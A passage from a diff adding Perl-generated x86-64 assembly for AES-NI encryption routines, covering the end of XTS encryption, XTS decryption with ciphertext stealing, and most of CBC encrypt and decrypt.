+	movaps	-0x50(%rbp),%xmm11
+	movaps	-0x40(%rbp),%xmm12
+	movaps	-0x30(%rbp),%xmm13
+	movaps	-0x20(%rbp),%xmm14
+	movaps	-0x10(%rbp),%xmm15
+___
+$code.=<<___;
+	lea	(%rbp),%rsp
+	pop	%rbp
+.Lxts_enc_epilogue:
+	ret
+.size	aesni_xts_encrypt,.-aesni_xts_encrypt
+___
+
+$code.=<<___;
+.globl	aesni_xts_decrypt
+.type	aesni_xts_decrypt,\@function,6
+.align	16
+aesni_xts_decrypt:
+	lea	(%rsp),%rax
+	push	%rbp
+	sub	\$$frame_size,%rsp
+	and	\$-16,%rsp	# Linux kernel stack can be incorrectly seeded
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,-0xa8(%rax)
+	movaps	%xmm7,-0x98(%rax)
+	movaps	%xmm8,-0x88(%rax)
+	movaps	%xmm9,-0x78(%rax)
+	movaps	%xmm10,-0x68(%rax)
+	movaps	%xmm11,-0x58(%rax)
+	movaps	%xmm12,-0x48(%rax)
+	movaps	%xmm13,-0x38(%rax)
+	movaps	%xmm14,-0x28(%rax)
+	movaps	%xmm15,-0x18(%rax)
+.Lxts_dec_body:
+___
+$code.=<<___;
+	lea	-8(%rax),%rbp
+	movups	($ivp),$inout0			# load clear-text tweak
+	mov	240($key2),$rounds		# key2->rounds
+	mov	240($key),$rnds_		# key1->rounds
+___
+	# generate the tweak
+	&aesni_generate1("enc",$key2,$rounds,$inout0);
+$code.=<<___;
+	xor	%eax,%eax			# if ($len%16) len-=16;
+	test	\$15,$len
+	setnz	%al
+	shl	\$4,%rax
+	sub	%rax,$len
+
+	$movkey	($key),$rndkey0			# zero round key
+	mov	$key,$key_			# backup $key
+	mov	$rnds_,$rounds			# backup $rounds
+	shl	\$4,$rnds_
+	mov	$len,$len_			# backup $len
+	and	\$-16,$len
+
+	$movkey	16($key,$rnds_),$rndkey1	# last round key
+
+	movdqa	.Lxts_magic(%rip),$twmask
+	movdqa	$inout0,@tweak[5]
+	pshufd	\$0x5f,$inout0,$twres
+	pxor	$rndkey0,$rndkey1
+___
+    for ($i=0;$i<4;$i++) {
+    $code.=<<___;
+	movdqa	$twres,$twtmp
+	paddd	$twres,$twres
+	movdqa	@tweak[5],@tweak[$i]
+	psrad	\$31,$twtmp			# broadcast upper bits
+	paddq	@tweak[5],@tweak[5]
+	pand	$twmask,$twtmp
+	pxor	$rndkey0,@tweak[$i]
+	pxor	$twtmp,@tweak[5]
+___
+    }
+$code.=<<___;
+	movdqa	@tweak[5],@tweak[4]
+	psrad	\$31,$twres
+	paddq	@tweak[5],@tweak[5]
+	pand	$twmask,$twres
+	pxor	$rndkey0,@tweak[4]
+	pxor	$twres,@tweak[5]
+	movaps	$rndkey1,0x60(%rsp)		# save round[0]^round[last]
+
+	sub	\$16*6,$len
+	jc	.Lxts_dec_short
+
+	mov	\$16+96,$rounds
+	lea	32($key_,$rnds_),$key		# end of key schedule
+	sub	%r10,%rax			# twisted $rounds
+	$movkey	16($key_),$rndkey1
+	mov	%rax,%r10			# backup twisted $rounds
+	lea	.Lxts_magic(%rip),%r8
+	jmp	.Lxts_dec_grandloop
+
+.align	32
+.Lxts_dec_grandloop:
+	movdqu	`16*0`($inp),$inout0		# load input
+	movdqa	$rndkey0,$twmask
+	movdqu	`16*1`($inp),$inout1
+	pxor	@tweak[0],$inout0
+	movdqu	`16*2`($inp),$inout2
+	pxor	@tweak[1],$inout1
+	 aesdec		$rndkey1,$inout0
+	movdqu	`16*3`($inp),$inout3
+	pxor	@tweak[2],$inout2
+	 aesdec		$rndkey1,$inout1
+	movdqu	`16*4`($inp),$inout4
+	pxor	@tweak[3],$inout3
+	 aesdec		$rndkey1,$inout2
+	movdqu	`16*5`($inp),$inout5
+	pxor	@tweak[5],$twmask		# round[0]^=tweak[5]
+	 movdqa	0x60(%rsp),$twres		# load round[0]^round[last]
+	pxor	@tweak[4],$inout4
+	 aesdec		$rndkey1,$inout3
+	$movkey	32($key_),$rndkey0
+	lea	`16*6`($inp),$inp
+	pxor	$twmask,$inout5
+
+	 pxor	$twres,@tweak[0]
+	aesdec		$rndkey1,$inout4
+	 pxor	$twres,@tweak[1]
+	 movdqa	@tweak[0],`16*0`(%rsp)		# put aside tweaks^last round key
+	aesdec		$rndkey1,$inout5
+	$movkey		48($key_),$rndkey1
+	 pxor	$twres,@tweak[2]
+
+	aesdec		$rndkey0,$inout0
+	 pxor	$twres,@tweak[3]
+	 movdqa	@tweak[1],`16*1`(%rsp)
+	aesdec		$rndkey0,$inout1
+	 pxor	$twres,@tweak[4]
+	 movdqa	@tweak[2],`16*2`(%rsp)
+	aesdec		$rndkey0,$inout2
+	aesdec		$rndkey0,$inout3
+	 pxor	$twres,$twmask
+	 movdqa	@tweak[4],`16*4`(%rsp)
+	aesdec		$rndkey0,$inout4
+	aesdec		$rndkey0,$inout5
+	$movkey		64($key_),$rndkey0
+	 movdqa	$twmask,`16*5`(%rsp)
+	pshufd	\$0x5f,@tweak[5],$twres
+	jmp	.Lxts_dec_loop6
+.align	32
+.Lxts_dec_loop6:
+	aesdec		$rndkey1,$inout0
+	aesdec		$rndkey1,$inout1
+	aesdec		$rndkey1,$inout2
+	aesdec		$rndkey1,$inout3
+	aesdec		$rndkey1,$inout4
+	aesdec		$rndkey1,$inout5
+	$movkey		-64($key,%rax),$rndkey1
+	add		\$32,%rax
+
+	aesdec		$rndkey0,$inout0
+	aesdec		$rndkey0,$inout1
+	aesdec		$rndkey0,$inout2
+	aesdec		$rndkey0,$inout3
+	aesdec		$rndkey0,$inout4
+	aesdec		$rndkey0,$inout5
+	$movkey		-80($key,%rax),$rndkey0
+	jnz		.Lxts_dec_loop6
+
+	movdqa	(%r8),$twmask
+	movdqa	$twres,$twtmp
+	paddd	$twres,$twres
+	 aesdec		$rndkey1,$inout0
+	paddq	@tweak[5],@tweak[5]
+	psrad	\$31,$twtmp
+	 aesdec		$rndkey1,$inout1
+	pand	$twmask,$twtmp
+	$movkey	($key_),@tweak[0]		# load round[0]
+	 aesdec		$rndkey1,$inout2
+	 aesdec		$rndkey1,$inout3
+	 aesdec		$rndkey1,$inout4
+	pxor	$twtmp,@tweak[5]
+	movaps	@tweak[0],@tweak[1]		# copy round[0]
+	 aesdec		$rndkey1,$inout5
+	 $movkey	-64($key),$rndkey1
+
+	movdqa	$twres,$twtmp
+	 aesdec		$rndkey0,$inout0
+	paddd	$twres,$twres
+	pxor	@tweak[5],@tweak[0]
+	 aesdec		$rndkey0,$inout1
+	psrad	\$31,$twtmp
+	paddq	@tweak[5],@tweak[5]
+	 aesdec		$rndkey0,$inout2
+	 aesdec		$rndkey0,$inout3
+	pand	$twmask,$twtmp
+	movaps	@tweak[1],@tweak[2]
+	 aesdec		$rndkey0,$inout4
+	pxor	$twtmp,@tweak[5]
+	movdqa	$twres,$twtmp
+	 aesdec		$rndkey0,$inout5
+	 $movkey	-48($key),$rndkey0
+
+	paddd	$twres,$twres
+	 aesdec		$rndkey1,$inout0
+	pxor	@tweak[5],@tweak[1]
+	psrad	\$31,$twtmp
+	 aesdec		$rndkey1,$inout1
+	paddq	@tweak[5],@tweak[5]
+	pand	$twmask,$twtmp
+	 aesdec		$rndkey1,$inout2
+	 aesdec		$rndkey1,$inout3
+	 movdqa	@tweak[3],`16*3`(%rsp)
+	pxor	$twtmp,@tweak[5]
+	 aesdec		$rndkey1,$inout4
+	movaps	@tweak[2],@tweak[3]
+	movdqa	$twres,$twtmp
+	 aesdec		$rndkey1,$inout5
+	 $movkey	-32($key),$rndkey1
+
+	paddd	$twres,$twres
+	 aesdec		$rndkey0,$inout0
+	pxor	@tweak[5],@tweak[2]
+	psrad	\$31,$twtmp
+	 aesdec		$rndkey0,$inout1
+	paddq	@tweak[5],@tweak[5]
+	pand	$twmask,$twtmp
+	 aesdec		$rndkey0,$inout2
+	 aesdec		$rndkey0,$inout3
+	 aesdec		$rndkey0,$inout4
+	pxor	$twtmp,@tweak[5]
+	movaps	@tweak[3],@tweak[4]
+	 aesdec		$rndkey0,$inout5
+
+	movdqa	$twres,$rndkey0
+	paddd	$twres,$twres
+	 aesdec		$rndkey1,$inout0
+	pxor	@tweak[5],@tweak[3]
+	psrad	\$31,$rndkey0
+	 aesdec		$rndkey1,$inout1
+	paddq	@tweak[5],@tweak[5]
+	pand	$twmask,$rndkey0
+	 aesdec		$rndkey1,$inout2
+	 aesdec		$rndkey1,$inout3
+	pxor	$rndkey0,@tweak[5]
+	$movkey		($key_),$rndkey0
+	 aesdec		$rndkey1,$inout4
+	 aesdec		$rndkey1,$inout5
+	$movkey		16($key_),$rndkey1
+
+	pxor	@tweak[5],@tweak[4]
+	 aesdeclast	`16*0`(%rsp),$inout0
+	psrad	\$31,$twres
+	paddq	@tweak[5],@tweak[5]
+	 aesdeclast	`16*1`(%rsp),$inout1
+	 aesdeclast	`16*2`(%rsp),$inout2
+	pand	$twmask,$twres
+	mov	%r10,%rax			# restore $rounds
+	 aesdeclast	`16*3`(%rsp),$inout3
+	 aesdeclast	`16*4`(%rsp),$inout4
+	 aesdeclast	`16*5`(%rsp),$inout5
+	pxor	$twres,@tweak[5]
+
+	lea	`16*6`($out),$out
+	movups	$inout0,`-16*6`($out)		# write output
+	movups	$inout1,`-16*5`($out)
+	movups	$inout2,`-16*4`($out)
+	movups	$inout3,`-16*3`($out)
+	movups	$inout4,`-16*2`($out)
+	movups	$inout5,`-16*1`($out)
+	sub	\$16*6,$len
+	jnc	.Lxts_dec_grandloop
+
+	mov	\$16+96,$rounds
+	sub	$rnds_,$rounds
+	mov	$key_,$key			# restore $key
+	shr	\$4,$rounds			# restore original value
+
+.Lxts_dec_short:
+	mov	$rounds,$rnds_			# backup $rounds
+	pxor	$rndkey0,@tweak[0]
+	pxor	$rndkey0,@tweak[1]
+	add	\$16*6,$len
+	jz	.Lxts_dec_done
+
+	pxor	$rndkey0,@tweak[2]
+	cmp	\$0x20,$len
+	jb	.Lxts_dec_one
+	pxor	$rndkey0,@tweak[3]
+	je	.Lxts_dec_two
+
+	pxor	$rndkey0,@tweak[4]
+	cmp	\$0x40,$len
+	jb	.Lxts_dec_three
+	je	.Lxts_dec_four
+
+	movdqu	($inp),$inout0
+	movdqu	16*1($inp),$inout1
+	movdqu	16*2($inp),$inout2
+	pxor	@tweak[0],$inout0
+	movdqu	16*3($inp),$inout3
+	pxor	@tweak[1],$inout1
+	movdqu	16*4($inp),$inout4
+	lea	16*5($inp),$inp
+	pxor	@tweak[2],$inout2
+	pxor	@tweak[3],$inout3
+	pxor	@tweak[4],$inout4
+
+	call	_aesni_decrypt6
+
+	xorps	@tweak[0],$inout0
+	xorps	@tweak[1],$inout1
+	xorps	@tweak[2],$inout2
+	movdqu	$inout0,($out)
+	xorps	@tweak[3],$inout3
+	movdqu	$inout1,16*1($out)
+	xorps	@tweak[4],$inout4
+	movdqu	$inout2,16*2($out)
+	 pxor		$twtmp,$twtmp
+	movdqu	$inout3,16*3($out)
+	 pcmpgtd	@tweak[5],$twtmp
+	movdqu	$inout4,16*4($out)
+	lea	16*5($out),$out
+	 pshufd		\$0x13,$twtmp,@tweak[1]	# $twres
+	and	\$15,$len_
+	jz	.Lxts_dec_ret
+
+	movdqa	@tweak[5],@tweak[0]
+	paddq	@tweak[5],@tweak[5]		# psllq 1,$tweak
+	pand	$twmask,@tweak[1]		# isolate carry and residue
+	pxor	@tweak[5],@tweak[1]
+	jmp	.Lxts_dec_done2
+
+.align	16
+.Lxts_dec_one:
+	movups	($inp),$inout0
+	lea	16*1($inp),$inp
+	xorps	@tweak[0],$inout0
+___
+	&aesni_generate1("dec",$key,$rounds);
+$code.=<<___;
+	xorps	@tweak[0],$inout0
+	movdqa	@tweak[1],@tweak[0]
+	movups	$inout0,($out)
+	movdqa	@tweak[2],@tweak[1]
+	lea	16*1($out),$out
+	jmp	.Lxts_dec_done
+
+.align	16
+.Lxts_dec_two:
+	movups	($inp),$inout0
+	movups	16($inp),$inout1
+	lea	32($inp),$inp
+	xorps	@tweak[0],$inout0
+	xorps	@tweak[1],$inout1
+
+	call	_aesni_decrypt2
+
+	xorps	@tweak[0],$inout0
+	movdqa	@tweak[2],@tweak[0]
+	xorps	@tweak[1],$inout1
+	movdqa	@tweak[3],@tweak[1]
+	movups	$inout0,($out)
+	movups	$inout1,16*1($out)
+	lea	16*2($out),$out
+	jmp	.Lxts_dec_done
+
+.align	16
+.Lxts_dec_three:
+	movups	($inp),$inout0
+	movups	16*1($inp),$inout1
+	movups	16*2($inp),$inout2
+	lea	16*3($inp),$inp
+	xorps	@tweak[0],$inout0
+	xorps	@tweak[1],$inout1
+	xorps	@tweak[2],$inout2
+
+	call	_aesni_decrypt3
+
+	xorps	@tweak[0],$inout0
+	movdqa	@tweak[3],@tweak[0]
+	xorps	@tweak[1],$inout1
+	movdqa	@tweak[4],@tweak[1]
+	xorps	@tweak[2],$inout2
+	movups	$inout0,($out)
+	movups	$inout1,16*1($out)
+	movups	$inout2,16*2($out)
+	lea	16*3($out),$out
+	jmp	.Lxts_dec_done
+
+.align	16
+.Lxts_dec_four:
+	movups	($inp),$inout0
+	movups	16*1($inp),$inout1
+	movups	16*2($inp),$inout2
+	xorps	@tweak[0],$inout0
+	movups	16*3($inp),$inout3
+	lea	16*4($inp),$inp
+	xorps	@tweak[1],$inout1
+	xorps	@tweak[2],$inout2
+	xorps	@tweak[3],$inout3
+
+	call	_aesni_decrypt4
+
+	pxor	@tweak[0],$inout0
+	movdqa	@tweak[4],@tweak[0]
+	pxor	@tweak[1],$inout1
+	movdqa	@tweak[5],@tweak[1]
+	pxor	@tweak[2],$inout2
+	movdqu	$inout0,($out)
+	pxor	@tweak[3],$inout3
+	movdqu	$inout1,16*1($out)
+	movdqu	$inout2,16*2($out)
+	movdqu	$inout3,16*3($out)
+	lea	16*4($out),$out
+	jmp	.Lxts_dec_done
+
+.align	16
+.Lxts_dec_done:
+	and	\$15,$len_
+	jz	.Lxts_dec_ret
+.Lxts_dec_done2:
+	mov	$len_,$len
+	mov	$key_,$key			# restore $key
+	mov	$rnds_,$rounds			# restore $rounds
+
+	movups	($inp),$inout0
+	xorps	@tweak[1],$inout0
+___
+	&aesni_generate1("dec",$key,$rounds);
+$code.=<<___;
+	xorps	@tweak[1],$inout0
+	movups	$inout0,($out)
+
+.Lxts_dec_steal:
+	movzb	16($inp),%eax			# borrow $rounds ...
+	movzb	($out),%ecx			# ... and $key
+	lea	1($inp),$inp
+	mov	%al,($out)
+	mov	%cl,16($out)
+	lea	1($out),$out
+	sub	\$1,$len
+	jnz	.Lxts_dec_steal
+
+	sub	$len_,$out			# rewind $out
+	mov	$key_,$key			# restore $key
+	mov	$rnds_,$rounds			# restore $rounds
+
+	movups	($out),$inout0
+	xorps	@tweak[0],$inout0
+___
+	&aesni_generate1("dec",$key,$rounds);
+$code.=<<___;
+	xorps	@tweak[0],$inout0
+	movups	$inout0,($out)
+
+.Lxts_dec_ret:
+___
+$code.=<<___ if ($win64);
+	movaps	-0xa0(%rbp),%xmm6
+	movaps	-0x90(%rbp),%xmm7
+	movaps	-0x80(%rbp),%xmm8
+	movaps	-0x70(%rbp),%xmm9
+	movaps	-0x60(%rbp),%xmm10
+	movaps	-0x50(%rbp),%xmm11
+	movaps	-0x40(%rbp),%xmm12
+	movaps	-0x30(%rbp),%xmm13
+	movaps	-0x20(%rbp),%xmm14
+	movaps	-0x10(%rbp),%xmm15
+___
+$code.=<<___;
+	lea	(%rbp),%rsp
+	pop	%rbp
+.Lxts_dec_epilogue:
+	ret
+.size	aesni_xts_decrypt,.-aesni_xts_decrypt
+___
+} }}
+
+########################################################################
+# void $PREFIX_cbc_encrypt (const void *inp, void *out,
+#			    size_t length, const AES_KEY *key,
+#			    unsigned char *ivp,const int enc);
+{
+my $frame_size = 0x10 + ($win64?0xa0:0);	# used in decrypt
+my ($iv,$in0,$in1,$in2,$in3,$in4)=map("%xmm$_",(10..15));
+my $inp_=$key_;
+
+$code.=<<___;
+.globl	${PREFIX}_cbc_encrypt
+.type	${PREFIX}_cbc_encrypt,\@function,6
+.align	16
+${PREFIX}_cbc_encrypt:
+	test	$len,$len		# check length
+	jz	.Lcbc_ret
+
+	mov	240($key),$rnds_	# key->rounds
+	mov	$key,$key_		# backup $key
+	test	%r9d,%r9d		# 6th argument
+	jz	.Lcbc_decrypt
+#--------------------------- CBC ENCRYPT ------------------------------#
+	movups	($ivp),$inout0		# load iv as initial state
+	mov	$rnds_,$rounds
+	cmp	\$16,$len
+	jb	.Lcbc_enc_tail
+	sub	\$16,$len
+	jmp	.Lcbc_enc_loop
+.align	16
+.Lcbc_enc_loop:
+	movups	($inp),$inout1		# load input
+	lea	16($inp),$inp
+	#xorps	$inout1,$inout0
+___
+	&aesni_generate1("enc",$key,$rounds,$inout0,$inout1);
+$code.=<<___;
+	mov	$rnds_,$rounds		# restore $rounds
+	mov	$key_,$key		# restore $key
+	movups	$inout0,0($out)		# store output
+	lea	16($out),$out
+	sub	\$16,$len
+	jnc	.Lcbc_enc_loop
+	add	\$16,$len
+	jnz	.Lcbc_enc_tail
+	movups	$inout0,($ivp)
+	jmp	.Lcbc_ret
+
+.Lcbc_enc_tail:
+	mov	$len,%rcx	# zaps $key
+	xchg	$inp,$out	# $inp is %rsi and $out is %rdi now
+	.long	0x9066A4F3	# rep movsb
+	mov	\$16,%ecx	# zero tail
+	sub	$len,%rcx
+	xor	%eax,%eax
+	.long	0x9066AAF3	# rep stosb
+	lea	-16(%rdi),%rdi	# rewind $out by 1 block
+	mov	$rnds_,$rounds	# restore $rounds
+	mov	%rdi,%rsi	# $inp and $out are the same
+	mov	$key_,$key	# restore $key
+	xor	$len,$len	# len=16
+	jmp	.Lcbc_enc_loop	# one more spin
+#--------------------------- CBC DECRYPT ------------------------------#
+.align	16
+.Lcbc_decrypt:
+	lea	(%rsp),%rax
+	push	%rbp
+	sub	\$$frame_size,%rsp
+	and	\$-16,%rsp	# Linux kernel stack can be incorrectly seeded
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,0x10(%rsp)
+	movaps	%xmm7,0x20(%rsp)
+	movaps	%xmm8,0x30(%rsp)
+	movaps	%xmm9,0x40(%rsp)
+	movaps	%xmm10,0x50(%rsp)
+	movaps	%xmm11,0x60(%rsp)
+	movaps	%xmm12,0x70(%rsp)
+	movaps	%xmm13,0x80(%rsp)
+	movaps	%xmm14,0x90(%rsp)
+	movaps	%xmm15,0xa0(%rsp)
+.Lcbc_decrypt_body:
+___
+$code.=<<___;
+	lea	-8(%rax),%rbp
+	movups	($ivp),$iv
+	mov	$rnds_,$rounds
+	cmp	\$0x50,$len
+	jbe	.Lcbc_dec_tail
+
+	$movkey	($key),$rndkey0
+	movdqu	0x00($inp),$inout0	# load input
+	movdqu	0x10($inp),$inout1
+	movdqa	$inout0,$in0
+	movdqu	0x20($inp),$inout2
+	movdqa	$inout1,$in1
+	movdqu	0x30($inp),$inout3
+	movdqa	$inout2,$in2
+	movdqu	0x40($inp),$inout4
+	movdqa	$inout3,$in3
+	movdqu	0x50($inp),$inout5
+	movdqa	$inout4,$in4
+	mov	OPENSSL_ia32cap_P+4(%rip),%r9d
+	cmp	\$0x70,$len
+	jbe	.Lcbc_dec_six_or_seven
+
+	and	\$`1<<26|1<<22`,%r9d	# isolate XSAVE+MOVBE	
+	sub	\$0x50,$len
+	cmp	\$`1<<22`,%r9d		# check for MOVBE without XSAVE
+	je	.Lcbc_dec_loop6_enter
+	sub	\$0x20,$len
+	lea	0x70($key),$key		# size optimization
+	jmp	.Lcbc_dec_loop8_enter
+.align	16
+.Lcbc_dec_loop8:
+	movups	$inout7,($out)
+	lea	0x10($out),$out
+.Lcbc_dec_loop8_enter:
+	movdqu		0x60($inp),$inout6
+	pxor		$rndkey0,$inout0
+	movdqu		0x70($inp),$inout7
+	pxor		$rndkey0,$inout1
+	$movkey		0x10-0x70($key),$rndkey1
+	pxor		$rndkey0,$inout2
+	xor		$inp_,$inp_
+	cmp		\$0x70,$len	# is there at least 0x60 bytes ahead?
+	pxor		$rndkey0,$inout3
+	pxor		$rndkey0,$inout4
+	pxor		$rndkey0,$inout5
+	pxor		$rndkey0,$inout6
+
+	aesdec		$rndkey1,$inout0
+	pxor		$rndkey0,$inout7
+	$movkey		0x20-0x70($key),$rndkey0
+	aesdec		$rndkey1,$inout1
+	aesdec		$rndkey1,$inout2
+	aesdec		$rndkey1,$inout3
+	aesdec		$rndkey1,$inout4
+	aesdec		$rndkey1,$inout5
+	aesdec		$rndkey1,$inout6
+	setnc		${inp_}b
+	shl		\$7,$inp_
+	aesdec		$rndkey1,$inout7
+	add		$inp,$inp_
+	$movkey		0x30-0x70($key),$rndkey1
+___
+for($i=1;$i<12;$i++) {
+my $rndkeyx = ($i&1)?$rndkey0:$rndkey1;
+$code.=<<___	if ($i==7);
+	cmp		\$11,$rounds
+___
+$code.=<<___;
+	aesdec		$rndkeyx,$inout0
+	aesdec		$rndkeyx,$inout1
+	aesdec		$rndkeyx,$inout2
+	aesdec		$rndkeyx,$inout3
+	aesdec		$rndkeyx,$inout4
+	aesdec		$rndkeyx,$inout5
+	aesdec		$rndkeyx,$inout6
+	aesdec		$rndkeyx,$inout7
+	$movkey		`0x30+0x10*$i`-0x70($key),$rndkeyx
+___
+$code.=<<___	if ($i<6 || (!($i&1) && $i>7));
+	nop
+___
+$code.=<<___	if ($i==7);
+	jb		.Lcbc_dec_done
+___
+$code.=<<___	if ($i==9);
+	je		.Lcbc_dec_done
+___
+$code.=<<___	if ($i==11);
+	jmp		.Lcbc_dec_done
+___
+}
+$code.=<<___;
+.align	16
+.Lcbc_dec_done:
+	aesdec		$rndkey1,$inout0
+	aesdec		$rndkey1,$inout1
+	pxor		$rndkey0,$iv
+	pxor		$rndkey0,$in0
+	aesdec		$rndkey1,$inout2
+	aesdec		$rndkey1,$inout3
+	pxor		$rndkey0,$in1
+	pxor		$rndkey0,$in2
+	aesdec		$rndkey1,$inout4
+	aesdec		$rndkey1,$inout5
+	pxor		$rndkey0,$in3
+	pxor		$rndkey0,$in4
+	aesdec		$rndkey1,$inout6
+	aesdec		$rndkey1,$inout7
+	movdqu		0x50($inp),$rndkey1
+
+	aesdeclast	$iv,$inout0
+	movdqu		0x60($inp),$iv		# borrow $iv
+	pxor		$rndkey0,$rndkey1
+	aesdeclast	$in0,$inout1
+	pxor		$rndkey0,$iv
+	movdqu		0x70($inp),$rndkey0	# next IV
+	aesdeclast	$in1,$inout2
+	lea		0x80($inp),$inp
+	movdqu		0x00($inp_),$in0
+	aesdeclast	$in2,$inout3
+	aesdeclast	$in3,$inout4
+	movdqu		0x10($inp_),$in1
+	movdqu		0x20($inp_),$in2
+	aesdeclast	$in4,$inout5
+	aesdeclast	$rndkey1,$inout6
+	movdqu		0x30($inp_),$in3
+	movdqu		0x40($inp_),$in4
+	aesdeclast	$iv,$inout7
+	movdqa		$rndkey0,$iv		# return $iv
+	movdqu		0x50($inp_),$rndkey1
+	$movkey		-0x70($key),$rndkey0
+
+	movups		$inout0,($out)		# store output
+	movdqa		$in0,$inout0
+	movups		$inout1,0x10($out)
+	movdqa		$in1,$inout1
+	movups		$inout2,0x20($out)
+	movdqa		$in2,$inout2
+	movups		$inout3,0x30($out)
+	movdqa		$in3,$inout3
+	movups		$inout4,0x40($out)
+	movdqa		$in4,$inout4
+	movups		$inout5,0x50($out)
+	movdqa		$rndkey1,$inout5
+	movups		$inout6,0x60($out)
+	lea		0x70($out),$out
+
+	sub	\$0x80,$len
+	ja	.Lcbc_dec_loop8
+
+	movaps	$inout7,$inout0
+	lea	-0x70($key),$key
+	add	\$0x70,$len
+	jle	.Lcbc_dec_tail_collected
+	movups	$inout7,($out)
+	lea	0x10($out),$out
+	cmp	\$0x50,$len
+	jbe	.Lcbc_dec_tail
+
+	movaps	$in0,$inout0
+.Lcbc_dec_six_or_seven:
+	cmp	\$0x60,$len
+	ja	.Lcbc_dec_seven
+
+	movaps	$inout5,$inout6
+	call	_aesni_decrypt6
+	pxor	$iv,$inout0		# ^= IV
+	movaps	$inout6,$iv
+	pxor	$in0,$inout1
+	movdqu	$inout0,($out)
+	pxor	$in1,$inout2
+	movdqu	$inout1,0x10($out)
+	pxor	$in2,$inout3
+	movdqu	$inout2,0x20($out)
+	pxor	$in3,$inout4
+	movdqu	$inout3,0x30($out)
+	pxor	$in4,$inout5
+	movdqu	$inout4,0x40($out)
+	lea	0x50($out),$out
+	movdqa	$inout5,$inout0
+	jmp	.Lcbc_dec_tail_collected
+
+.align	16
+.Lcbc_dec_seven:
+	movups	0x60($inp),$inout6
+	xorps	$inout7,$inout7
+	call	_aesni_decrypt8
+	movups	0x50($inp),$inout7
+	pxor	$iv,$inout0		# ^= IV
+	movups	0x60($inp),$iv
+	pxor	$in0,$inout1
+	movdqu	$inout0,($out)
+	pxor	$in1,$inout2
+	movdqu	$inout1,0x10($out)
+	pxor	$in2,$inout3
+	movdqu	$inout2,0x20($out)
+	pxor	$in3,$inout4
+	movdqu	$inout3,0x30($out)
+	pxor	$in4,$inout5
+	movdqu	$inout4,0x40($out)
+	pxor	$inout7,$inout6
+	movdqu	$inout5,0x50($out)
+	lea	0x60($out),$out
+	movdqa	$inout6,$inout0
+	jmp	.Lcbc_dec_tail_collected
+
+.align	16
+.Lcbc_dec_loop6:
+	movups	$inout5,($out)
+	lea	0x10($out),$out
+	movdqu	0x00($inp),$inout0	# load input
+	movdqu	0x10($inp),$inout1
+	movdqa	$inout0,$in0
+	movdqu	0x20($inp),$inout2
+	movdqa	$inout1,$in1
+	movdqu	0x30($inp),$inout3
+	movdqa	$inout2,$in2
+	movdqu	0x40($inp),$inout4
+	movdqa	$inout3,$in3
+	movdqu	0x50($inp),$inout5
+	movdqa	$inout4,$in4
+.Lcbc_dec_loop6_enter:
+	lea	0x60($inp),$inp
+	movdqa	$inout5,$inout6
+
+	call	_aesni_decrypt6
+
+	pxor	$iv,$inout0		# ^= IV
+	movdqa	$inout6,$iv
+	pxor	$in0,$inout1
+	movdqu	$inout0,($out)
+	pxor	$in1,$inout2
+	movdqu	$inout1,0x10($out)
+	pxor	$in2,$inout3
+	movdqu	$inout2,0x20($out)
+	pxor	$in3,$inout4
+	mov	$key_,$key
+	movdqu	$inout3,0x30($out)
+	pxor	$in4,$inout5
+	mov	$rnds_,$rounds
+	movdqu	$inout4,0x40($out)
+	lea	0x50($out),$out
+	sub	\$0x60,$len
+	ja	.Lcbc_dec_loop6
+
+	movdqa	$inout5,$inout0
+	add	\$0x50,$len
+	jle	.Lcbc_dec_tail_collected
+	movups	$inout5,($out)
+	lea	0x10($out),$out
+
+.Lcbc_dec_tail:
+	movups	($inp),$inout0
+	sub	\$0x10,$len
+	jbe	.Lcbc_dec_one
+
+	movups	0x10($inp),$inout1
+	movaps	$inout0,$in0
+	sub	\$0x10,$len
+	jbe	.Lcbc_dec_two
+
+	movups	0x20($inp),$inout2
+	movaps	$inout1,$in1
+	sub	\$0x10,$len
+	jbe	.Lcbc_dec_three
+
+	movups	0x30($inp),$inout3
+	movaps	$inout2,$in2
+	sub	\$0x10,$len
+	jbe	.Lcbc_dec_four
+
+	movups	0x40($inp),$inout4
+	movaps	$inout3,$in3
+	movaps	$inout4,$in4
+	xorps	$inout5,$inout5
+	call	_aesni_decrypt6
+	pxor	$iv,$inout0
+	movaps	$in4,$iv
+	pxor	$in0,$inout1
+	movdqu	$inout0,($out)
+	pxor	$in1,$inout2
+	movdqu	$inout1,0x10($out)
+	pxor	$in2,$inout3
+	movdqu	$inout2,0x20($out)
+	pxor	$in3,$inout4
+	movdqu	$inout3,0x30($out)
+	lea	0x40($out),$out
+	movdqa	$inout4,$inout0
+	sub	\$0x10,$len
+	jmp	.Lcbc_dec_tail_collected
+
+.align	16
+.Lcbc_dec_one:
+	movaps	$inout0,$in0
+___
+	&aesni_generate1("dec",$key,$rounds);
+$code.=<<___;
+	xorps	$iv,$inout0
+	movaps	$in0,$iv
+	jmp	.Lcbc_dec_tail_collected
+.align	16
+.Lcbc_dec_two:
+	movaps	$inout1,$in1
+	call	_aesni_decrypt2
+	pxor	$iv,$inout0
+	movaps	$in1,$iv
+	pxor	$in0,$inout1
+	movdqu	$inout0,($out)
+	movdqa	$inout1,$inout0
+	lea	0x10($out),$out
+	jmp	.Lcbc_dec_tail_collected
+.align	16
+.Lcbc_dec_three:
+	movaps	$inout2,$in2
+	call	_aesni_decrypt3
+	pxor	$iv,$inout0
+	movaps	$in2,$iv
+	pxor	$in0,$inout1
+	movdqu	$inout0,($out)
+	pxor	$in1,$inout2
+	movdqu	$inout1,0x10($out)
+	movdqa	$inout2,$inout0
+	lea	0x20($out),$out
+	jmp	.Lcbc_dec_tail_collected
+.align	16
+.Lcbc_dec_four:
+	movaps	$inout3,$in3
+	call	_aesni_decrypt4
+	pxor	$iv,$inout0
+	movaps	$in3,$iv
+	pxor	$in0,$inout1
+	movdqu	$inout0,($out)
+	pxor	$in1,$inout2
+	movdqu	$inout1,0x10($out)
+	pxor	$in2,$inout3
+	movdqu	$inout2,0x20($out)
+	movdqa	$inout3,$inout0
+	lea	0x30($out),$out
+	jmp	.Lcbc_dec_tail_collected
+
+.align	16
+.Lcbc_dec_tail_collected:
+	movups	$iv,($ivp)
+	and	\$15,$len
+	jnz	.Lcbc_dec_tail_partial
+	movups	$inout0,($out)
+	jmp	.Lcbc_dec_ret
+.align	16
+.Lcbc_dec_tail_partial:
+	movaps	$inout0,(%rsp)
+	mov	\$16,%rcx
+	mov	$out,%rdi
+	sub	$len,%rcx
+	lea	(%rsp),%rsi
+	.long	0x9066A4F3	# rep movsb
+
+.Lcbc_dec_ret:
+___
+$code.=<<___ if ($win64);
